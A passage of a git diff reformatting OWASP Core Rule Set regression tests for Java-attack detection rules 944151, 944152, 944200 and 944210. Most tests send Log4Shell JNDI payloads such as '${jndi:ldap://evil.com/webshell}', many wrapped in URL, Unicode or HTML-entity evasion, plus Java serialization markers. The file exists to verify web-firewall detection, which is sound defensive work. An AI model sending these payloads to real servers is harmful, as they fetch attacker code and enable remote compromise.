CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944151" - - test_title: 944151-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944151" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944151] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index e88f83f..f1509f2 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -1,474 +1,472 @@ --- -# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. -# 944152 should detect the same things as 944152 and 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944151.yaml. +# 944152 should detect the same things as 944150 and 944151. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944152.yaml" - description: "Description" +rule_id: 944152 tests: - - test_title: 944152-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-3 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 3 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-4 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 4 desc: Log4J exploit in XML code stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/xml - method: POST - port: 80 - uri: "/post" - data: "${jndi:ldap://evil.com/webshell}" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-5 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/xml + method: POST + port: 80 + uri: "/post" + data: "${jndi:ldap://evil.com/webshell}" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 5 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-6 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${env:FOO:-j}ndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 6 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-7 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${${::-j}${::-n}${::-d}${::-i}:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 7 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-8 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:something:-${env:something:-$}{jndi:ldap://evil.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 8 desc: Log4J exploit on arg foo, with Unicode escape encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$\u007Bjndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-9 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$\u007Bjndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 9 desc: Log4J exploit on JSON with URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-10 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 10 desc: Log4J exploit on JSON with Unicode escape evasion, uppercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-11 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007Bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 11 desc: Log4J exploit on JSON with Unicode escape evasion, lowercase stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-12 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 12 desc: Log4J exploit on JSON with named HTML entity evasion, lower case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-13 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 13 desc: Log4J exploit on JSON with named HTML entity evasion, upper case stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-14 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$&LBRACE;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 14 desc: Log4J exploit on JSON with numeric HTML entity evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-15 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 15 desc: Log4J exploit on JSON with Unicode escape evasion, wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-16 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 16 desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-17 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 17 desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-18 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 18 desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-19 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 19 desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-20 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 20 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-21 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 21 desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-22 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 22 desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-23 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 23 desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: '${jndi:ldap://evil.om/w}' - Content-Type: text/html - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-24 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: '${jndi:ldap://evil.om/w}' + Content-Type: text/html + method: GET + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 24 desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-25 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 25 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} - version: "HTTP/1.1" - output: - log_contains: id "944152" - - test_title: 944152-26 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}} + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] + - test_id: 26 desc: Log4J exploit on arg foo, with evasion stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' - version: "HTTP/1.1" - output: - log_contains: id "944152" + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}' + version: "HTTP/1.1" + output: + log: + expect_ids: [944152] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml index 288c536..8016cdc 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml @@ -1,17 +1,15 @@ --- meta: author: "spartantri" - enabled: true - name: "944200.yaml" - description: "Description" +rule_id: 944200 tests: - - test_title: 944200-1 + - test_id: 1 desc: Argument test includes java serialization magic bytes, base64 encoded request stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" - output: - log_contains: "id \"944200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + encoded_request: "UE9TVCAvIEhUVFAvMS4wDQpIb3N0OiBsb2NhbGhvc3QNClVzZXItQWdlbnQ6IE9XQVNQIE1vZFNlY3VyaXR5IENvcmUgUnVsZSBTZXQNCkFjY2VwdDogdGV4dC94bWwsYXBwbGljYXRpb24veG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCx0ZXh0L2h0bWw7cT0wLjksdGV4dC9wbGFpbjtxPTAuOCxpbWFnZS9wbmcsKi8qO3E9MC41DQpBY2NlcHQtQ2hhcnNldDogSVNPLTg4NTktMSx1dGYtODtxPTAuNywqO3E9MC43DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsZGVmbGF0ZQ0KQWNjZXB0LUxhbmd1YWdlOiBlbi11cyxlbjtxPTAuNQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiA5DQoNCnRlc3Q9rO0ABQ0KDQo=" + output: + log: + expect_ids: [944200] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index da10d5c..8aa8889 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -1,1108 +1,1106 @@ --- meta: author: "spartantri, azurit" - enabled: true - name: "944210.yaml" - description: "Positive tests for rule 944210" +rule_id: 944210 tests: - - test_title: 944210-1 + - test_id: 1 desc: "Argument test includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" - - test_title: 944210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" 